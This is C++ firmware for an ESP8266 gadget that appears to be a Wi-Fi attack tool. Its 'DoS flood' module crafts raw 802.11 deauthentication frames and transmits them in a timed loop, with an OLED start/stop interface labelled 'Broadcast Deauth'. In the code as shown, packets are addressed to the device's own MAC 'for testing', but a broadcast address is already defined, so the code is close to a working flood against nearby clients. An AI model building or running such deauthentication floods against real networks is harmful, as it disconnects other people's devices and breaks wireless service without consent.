#include "dos.h"
#include "utils.h"   // For random MAC, macToString
#include "config.h"  // For screen dimensions etc.
// #include "deauth.h"  // <<< INCLUDE DEAUTH HEADER for its packet structure
#include <U8g2lib.h> // For OLED drawing
#include <ESP8266WiFi.h> // For wifi_set_channel, wifi_send_pkt_freedom

// --- SDK Function Declarations ---
extern "C" {
    #include "user_interface.h"
    // Declare wifi_send_pkt_freedom if not already globally available
    // int wifi_send_pkt_freedom(uint8 *buf, int len, bool sys_seq);
}

// --- Copied Deauth Packet Structure (WORKAROUND) ---
// Define it here temporarily to resolve compilation error
typedef struct {
    struct {
        uint8_t protocol_version : 2;
        uint8_t type : 2;             // 0 = Management
        uint8_t subtype : 4;          // 12 = Deauthentication
        uint8_t flags;
    } __attribute__((packed)) frame_control;
    uint16_t duration_id;
    uint8_t addr1[6]; // Destination MAC (Receiver)
    uint8_t addr2[6]; // Source MAC (Transmitter)
    uint8_t addr3[6]; // BSSID (AP MAC)
    uint16_t seq_ctrl;
    uint16_t reason_code;
} __attribute__((packed)) deauth_packet_t; // Make sure this name matches what's used below

// --- Define Broadcast MAC locally ---
static const uint8_t broadcast_mac[6] = {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}; // <<< ADD BACK DEFINITION

// --- External UI Elements ---
extern U8G2_SSD1306_128X64_NONAME_F_HW_I2C oled;
extern bool needsRedraw;
extern UIState currentState; // To return to main menu

// --- Internal State ---
bool dos_flood_active = false; // Definition of the flag
static uint8_t current_dos_channel = 1;
static unsigned long last_dos_packet_time = 0;
// static unsigned long last_dos_channel_hop_time = 0; // <<< No longer needed
static unsigned long last_dos_redraw_time = 0;
static uint32_t dos_packets_sent = 0;

// --- Packet Buffer ---
static deauth_packet_t dos_packet_buffer; // <<< USE deauth_packet_t from deauth.h

// --- Initialization ---
void dos_init() {
    Serial.println("DoS Module Initialized (Broadcast Deauth Flood).");
    Serial.printf("DoS Init: Calculated deauth_packet_t size: %d bytes\n", sizeof(deauth_packet_t)); // <<< CORRECT SIZEOF ARGUMENT
    dos_flood_active = false;
    current_dos_channel = 1;
    last_dos_packet_time = 0;
    last_dos_redraw_time = 0;
    dos_packets_sent = 0;
    // Don't enable promiscuous mode or set channel here, wait for start
}

// --- Stop Function ---
void dos_stop() {
    if (dos_flood_active) {
        dos_flood_active = false;
        Serial.println("DoS Flood Stopped.");
        wifi_promiscuous_enable(0); // Disable promiscuous mode
        Serial.println("DoS Stop: Disabled promiscuous mode.");
        // Optional: Restore original channel?
        needsRedraw = true; // Redraw UI to show stopped state
    }
}

// --- Main Update Loop ---
void dos_update() {
    if (!dos_flood_active) { // <<< RESTORE: Only run when active
        return;
    }

    unsigned long current_time = millis();
    bool packet_sent_this_cycle = false;

    // --- REMOVED Channel Hopping Logic ---

    // --- Send Deauth Packet (Targeting Self) ---
    if (current_time - last_dos_packet_time > DOS_PACKET_INTERVAL) {
        // 1. Get device's own MAC
        uint8_t station_mac[6];
        wifi_get_macaddr(STATION_IF, station_mac);

        // 2. Fill packet structure (using deauth_packet_t fields)
        dos_packet_buffer.frame_control.type = 0;    // Management frame
        dos_packet_buffer.frame_control.subtype = 12; // Deauthentication subtype
        dos_packet_buffer.duration_id = 0; // Or 314 microseconds
        memcpy(dos_packet_buffer.addr1, station_mac, 6); // <<< Destination: Send to SELF for testing
        memcpy(dos_packet_buffer.addr2, station_mac, 6);    // Source: Use device's own MAC
        memcpy(dos_packet_buffer.addr3, station_mac, 6);    // BSSID: Use device's own MAC
        dos_packet_buffer.seq_ctrl = 0; // SDK handles sequence if sys_seq=true, otherwise 0 is fine
        dos_packet_buffer.reason_code = 1; // Reason: Unspecified

        // 3. Send packet
        int result = wifi_send_pkt_freedom((uint8_t*)&dos_packet_buffer, sizeof(deauth_packet_t), true); // sys_seq=true

        // 4. Log and count
        if (result == 0) {
            dos_packets_sent++;
            packet_sent_this_cycle = true;
        } else {
            Serial.printf("!!! DoS Send (Self): Ch=%d -> FAIL (Result: %d)\n", current_dos_channel, result); // Update log message
        }
        last_dos_packet_time = current_time;
    }

     // --- Trigger Redraw Periodically ---
    if (packet_sent_this_cycle && (current_time - last_dos_redraw_time > 500)) { // Update ~2 times/sec
        needsRedraw = true;
        last_dos_redraw_time = current_time;
    }

    yield(); // Prevent WDT reset
}

// --- UI Drawing Function ---
void dos_draw() {
    oled.setFont(u8g2_font_6x10_tf);

    if (dos_flood_active) {
        oled.drawStr(0, 25, "DoS Flood Active!");
        char count_str[30];
        snprintf(count_str, sizeof(count_str), "Sent: %lu", dos_packets_sent);
        oled.drawStr(0, 40, count_str);
        char chan_str[20];
        snprintf(chan_str, sizeof(chan_str), "Channel: %d (Fixed)", current_dos_channel);
        oled.drawStr(0, 55, chan_str);
        oled.drawStr(0, SCREEN_HEIGHT - 1, "LONG: Stop");
    } else {
        oled.drawStr(0, 30, "DoS Flood Ready");
        oled.drawStr(0, 45, "(Broadcast Deauth)");
        oled.drawStr(0, SCREEN_HEIGHT - 1, "LONG: Start");
    }
}

// --- Input Handling Function ---
void dos_handle_input(ButtonPressType pressType) {
    if (pressType == ButtonPressType::LONG_PRESS) {
        if (dos_flood_active) {
            // Stop the flood
            dos_stop();
            // dos_flood_active is set to false inside dos_stop()
        } else {
            // Start the flood (targeting self for now)
            dos_flood_active = true;
            dos_packets_sent = 0; // Reset counter
            current_dos_channel = 1; // Set FIXED channel
            Serial.println("DoS Flood Started (Targeting Self).");

            // <<< ADD WiFi Reset Steps >>>
            Serial.println("DoS Start: Disconnecting WiFi...");
            WiFi.disconnect(); // Force disconnect to reset state
            delay(100); // Allow time for disconnect to process

            wifi_set_opmode(STATION_MODE); // <<< Explicitly set STA mode
            Serial.println("DoS Start: Set opmode to STATION_MODE.");
            delay(50); // Short delay after setting mode

            wifi_promiscuous_enable(1); // Enable promiscuous mode
            Serial.println("DoS Start: Enabled promiscuous mode.");
            delay(50); // Short delay after enabling promiscuous

            bool channel_set_ok = wifi_set_channel(current_dos_channel); // Set initial channel
             if (!channel_set_ok) {
                 Serial.printf("DoS Start: Set initial channel %d -> FAIL\n", current_dos_channel);
                 wifi_promiscuous_enable(0); // Clean up on failure
                 dos_flood_active = false; // Don't start if channel set failed
                 return; // Don't proceed if channel set failed
             } else {
                 Serial.printf("DoS Start: Set initial channel %d -> OK\n", current_dos_channel);
                 delay(5); // Short delay after channel set
             }
             last_dos_packet_time = millis(); // Initialize timers
             last_dos_redraw_time = millis();
             needsRedraw = true;
        }
    }
    // Short press currently does nothing in this mode
} 